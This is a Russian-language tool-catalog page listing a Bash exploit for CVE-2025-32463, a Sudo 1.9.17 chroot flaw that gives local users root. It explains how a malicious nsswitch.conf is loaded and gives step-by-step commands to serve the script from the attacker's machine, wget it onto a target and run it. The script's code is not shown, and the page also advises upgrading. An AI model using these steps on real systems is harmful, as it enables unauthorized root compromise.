Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32463 — Bash-скрипт эксплойта для CVE-2025-32463, уязвимости локального повышения привилегий в Sudo 1.9.17 через опцию chroot, обеспечивающей доступ root на затронутых системах. | Kitploit
Инструменты/GitHubGitHub/justjoeyking/cve-2025-32463
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

Bash-скрипт эксплойта для CVE-2025-32463, уязвимости локального повышения привилегий в Sudo 1.9.17 через опцию chroot, обеспечивающей доступ root на затронутых системах.

Репозиторий
29 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Версия Sudo 1.9.17 содержит критическую уязвимость (CVE-2025-32463), которая позволяет локальным пользователям получить root-доступ, используя опцию chroot, что может привести к серьёзным рискам безопасности. Пользователям рекомендуется обновиться до версии 1.9.17p1 или новее, чтобы устранить эту проблему.

Обзор уязвимости Sudo 1.9.17:-

Уязвимость в версии Sudo 1.9.17, обозначенная как CVE-2025-32463, является критической ошибкой, позволяющей локальным пользователям получить root-доступ. Проблема возникает из-за изменения того, как Sudo обрабатывает опцию --chroot (-R), которая предназначена для изоляции процессов путём изменения их корневого каталога.

Как работает уязвимость:-

Проблема разрешения пути: В версиях с 1.9.14 по 1.9.17 Sudo оценивает опцию --chroot до проверки прав пользователя. Это позволяет злоумышленникам контролировать среду и загружать вредоносные библиотеки.

Шаги эксплуатации:

  • Злоумышленник создаёт вредоносный файл nsswitch.conf в каталоге, который он контролирует.
  • Он выполняет Sudo с опцией -R, в результате чего Sudo загружает конфигурацию и библиотеки злоумышленника, предоставляя root-доступ.

Я создал bash-скрипт "cwoot.sh", который после выполнения напрямую повышает привилегии до root.

Выполните следующее:

Скачайте скрипт из репозитория: git clone https://github.com/justjoeyking/CVE-2025-32463.git

На своей машине: python3 -m http.server 8080

На целевой машине: wget http://<собственный_IP_адрес>:8080/cwoot.sh

На целевой машине: chmod 755 cwoot.sh

Выполните скрипт на целевой машине: ./cwoot.sh

Скачать инструмент